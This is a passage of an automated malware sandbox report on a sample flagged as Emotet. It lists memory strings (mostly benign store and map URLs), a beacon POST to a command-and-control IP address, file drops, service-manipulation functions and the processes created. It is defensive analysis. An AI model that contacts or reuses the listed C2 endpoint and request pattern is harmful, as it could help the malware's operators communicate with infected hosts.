","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":
                Source: svchost.exe, 00000012.00000003.353884383.00000269669B9000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"finding game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":
                Source: svchost.exe, 00000012.00000003.356154913.00000269669DD000.00000004.00000001.sdmpString found in binary or memory: t enough. \r\n\r\nSHARE WITH FRIENDS \r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity. \r\n\r\nPrivacy Policy: https://www.facebook.com/about/privacy/ \r\nLEARN MORE at: http://messenger.com","ProductTitle":"Messenger","SearchTitles":[],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9WZDNCRF0083","Properties":{"PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","PackageIdentityName":"FACEBOOK.317180B0BB486","PublisherCertificateName":"CN=6E08453F-9BA7-4311-999C-D22FBA2FB1B8","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"c6a9fa5c-20a2-4e12-904d-edd408657dc8"},{"IdType":"LegacyWindowsPhoneProductId","Value":"3219d30d-4a23-4f58-a91c-c44b04e6a0c7"},{"IdType":"XboxTitleId","Value":"2004208728"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-09-23T01:40:51.0338882Z||.||d78822b5-4d6c-49fa-a7d8-5bd164a99315||1152921505691739511||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-09-23T01:39:26.3005240Z","LocalizedProperties":[{"SkuDescription":"Made for big screens and close connections. Get access to free texting, and high-quality voice & video chat built specifically for desktop.\r\n\r\nNEW! GET THE GROUP TOGETHER WITH ROOMS\r\nSend a link to group video chat with anyone, even if they don't have Messenger.
                Source: svchost.exe, 00000012.00000003.356242817.0000026966929000.00000004.00000001.sdmpString found in binary or memory: t enough. \r\n\r\nSHARE WITH FRIENDS \r\nSend photos and videos to keep your close friends up to speed. Receive files for even more productivity. \r\n\r\nPrivacy Policy: https://www.facebook.com/about/privacy/ \r\nLEARN MORE at: http://messenger.com","SkuTitle":"Messenger","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9WZDNCRF0083","Properties":{"FulfillmentData":{"ProductId":"9WZDNCRF0083","WuCategoryId":"c6a9fa5c-20a2-4e12-904d-edd408657dc8","PackageFamilyName":"Facebook.317180B0BB486_8xx8rvfyw5nnt","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x64"],"Capabilities":["runFullTrust","internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":155162962,"PackageFormat":"Appx","Packag equals www.facebook.com (Facebook)
                Source: unknownHTTP traffic detected: POST /WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 174.106.122.139/WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------AkDekGTz9Host: 174.106.122.139Content-Length: 4596Cache-Control: no-cache
                Source: unregmp2.exe, 00000003.00000002.475237596.0000000002A10000.00000004.00000001.sdmpString found in binary or memory: http://174.106.122.139/WkVTB/IyTRQV6r5gRVh0eW8/Pvtg4MJreF6izA88J/w19T8y6pEQH26/
                Source: svchost.exe, 00000008.00000002.475735439.000002179C26E000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsoft.
                Source: svchost.exe, 00000008.00000002.475677078.000002179C25E000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.354004031.000002696692B000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: svchost.exe, 00000008.00000002.475677078.000002179C25E000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.354004031.000002696692B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: svchost.exe, 00000008.00000002.475735439.000002179C26E000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.354004031.000002696692B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                Source: svchost.exe, 00000008.00000002.476174205.000002179C430000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: svchost.exe, 00000008.00000002.472011715.0000021796CAB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumera
                Source: svchost.exe, 00000008.00000002.472011715.0000021796CAB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
                Source: svchost.exe, 0000000B.00000002.304669299.00000245F0013000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                Source: svchost.exe, 00000012.00000003.353826978.000002696697C000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.353884383.00000269669B9000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                Source: svchost.exe, 00000012.00000003.353826978.000002696697C000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.353884383.00000269669B9000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                Source: svchost.exe, 00000012.00000003.352905470.0000026966978000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
                Source: svchost.exe, 00000012.00000003.352905470.0000026966978000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
                Source: svchost.exe, 00000002.00000002.471236809.00000217CC63E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                Source: svchost.exe, 00000002.00000002.471236809.00000217CC63E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                Source: svchost.exe, 00000002.00000002.471236809.00000217CC63E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                Source: svchost.exe, 0000000B.00000003.304378205.00000245F005F000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                Source: svchost.exe, 00000002.00000002.471236809.00000217CC63E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 00000002.00000002.471236809.00000217CC63E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                Source: svchost.exe, 0000000B.00000003.304400073.00000245F005A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000B.00000003.304378205.00000245F005F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                Source: svchost.exe, 0000000B.00000002.304715466.00000245F003D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                Source: svchost.exe, 0000000B.00000003.304378205.00000245F005F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000B.00000002.304735124.00000245F004E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 0000000B.00000003.282556367.00000245F0031000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                Source: svchost.exe, 0000000B.00000002.304715466.00000245F003D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                Source: svchost.exe, 0000000B.00000003.304378205.00000245F005F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                Source: svchost.exe, 0000000B.00000003.304378205.00000245F005F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                Source: svchost.exe, 0000000B.00000003.304378205.00000245F005F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                Source: svchost.exe, 0000000B.00000003.282556367.00000245F0031000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                Source: svchost.exe, 0000000B.00000003.304418313.00000245F0040000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                Source: svchost.exe, 0000000B.00000003.304418313.00000245F0040000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                Source: svchost.exe, 0000000B.00000003.304378205.00000245F005F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                Source: svchost.exe, 0000000B.00000003.304418313.00000245F0040000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.304400073.00000245F005A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                Source: svchost.exe, 0000000B.00000003.304400073.00000245F005A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.304400073.00000245F005A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.304400073.00000245F005A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000B.00000002.304763552.00000245F0064000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000003.304400073.00000245F005A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                Source: svchost.exe, 0000000B.00000003.304378205.00000245F005F000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                Source: svchost.exe, 0000000B.00000002.304715466.00000245F003D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                Source: svchost.exe, 0000000B.00000003.282556367.00000245F0031000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                Source: svchost.exe, 00000012.00000003.353826978.000002696697C000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.353884383.00000269669B9000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                Source: svchost.exe, 0000000B.00000002.304715466.00000245F003D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                Source: svchost.exe, 0000000B.00000002.304669299.00000245F0013000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.304715466.00000245F003D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.304418313.00000245F0040000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.304418313.00000245F0040000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.282556367.00000245F0031000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                Source: svchost.exe, 0000000B.00000003.282556367.00000245F0031000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                Source: svchost.exe, 0000000B.00000002.304735124.00000245F004E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                Source: svchost.exe, 00000008.00000002.475677078.000002179C25E000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.354004031.000002696692B000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: svchost.exe, 00000012.00000003.352905470.0000026966978000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
                Source: svchost.exe, 00000012.00000003.352893090.0000026966967000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info

                E-Banking Fraud:

                barindex
                Yara detected EmotetShow sources
                Source: Yara matchFile source: 00000003.00000002.471301140.00000000004E4000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.205426555.0000000002081000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.205338355.0000000002050000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.205378378.0000000002064000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.471359419.0000000000511000.00000020.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.471236133.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 3.2.unregmp2.exe.510000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.TOfDTHKl.exe.2080000.1.unpack, type: UNPACKEDPE
                Source: C:\Users\user\Desktop\TOfDTHKl.exeFile created: C:\Windows\SysWOW64\Faultrep\Jump to behavior
                Source: C:\Users\user\Desktop\TOfDTHKl.exeFile deleted: C:\Windows\SysWOW64\Faultrep\unregmp2.exe:Zone.IdentifierJump to behavior
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_004034C11_2_004034C1
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_00403AE81_2_00403AE8
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_020882B01_2_020882B0
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02087F301_2_02087F30
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02081C601_2_02081C60
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02083CB01_2_02083CB0
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02083EE01_2_02083EE0
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_020877001_2_02087700
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02083F071_2_02083F07
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02083B201_2_02083B20
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_020865B01_2_020865B0
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02059E4E1_2_02059E4E
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205584E1_2_0205584E
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205E64B1_2_0205E64B
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205E6621_2_0205E662
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02055A7E1_2_02055A7E
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205929E1_2_0205929E
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02055AA51_2_02055AA5
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_020556BE1_2_020556BE
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02059ACE1_2_02059ACE
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205814E1_2_0205814E
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205E15B1_2_0205E15B
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_0205E3BA1_2_0205E3BA
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_020537FE1_2_020537FE
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exeCode function: 3_2_004034C13_2_004034C1
                Source: C:\Windows\SysWOW64\Faultrep\unregmp2.exeCode function: 3_2_00403AE83_2_00403AE8
                Source: TOfDTHKl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: TOfDTHKl.exe, 00000001.00000002.206166023.0000000002700000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs TOfDTHKl.exe
                Source: TOfDTHKl.exe, 00000001.00000002.206276366.0000000002760000.00000002.00000001.sdmpBinary or memory string: originalfilename vs TOfDTHKl.exe
                Source: TOfDTHKl.exe, 00000001.00000002.206276366.0000000002760000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs TOfDTHKl.exe
                Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dllJump to behavior
                Source: classification engineClassification label: mal76.troj.evad.winEXE@18/8@0/3
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: CloseServiceHandle,_snwprintf,CreateServiceW,OpenSCManagerW,OpenSCManagerW,CloseServiceHandle,1_2_02088840
                Source: C:\Users\user\Desktop\TOfDTHKl.exeCode function: 1_2_02085070 QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,EnumServicesStatusExW,GetTickCount,OpenServiceW,OpenServiceW,ChangeServiceConfig2W,GetProcessHeap,HeapFree,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,1_2_02085070
                Source: C:\Users\user\Desktop\TOfDTHKl.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6396:120:WilError_01
                Source: TOfDTHKl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\TOfDTHKl.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\TOfDTHKl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: TOfDTHKl.exeVirustotal: Detection: 10%
                Source: TOfDTHKl.exeReversingLabs: Detection: 12%
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                Source: unknownProcess created: C:\Users\user\Desktop\TOfDTHKl.exe 'C:\Users\user\Desktop\TOfDTHKl.exe'
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                Source: unknownProcess created: C:\Windows\SysWOW64\Faultrep\unregmp2.exe C:\Windows\SysWOW64\Faultrep\unregmp2.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
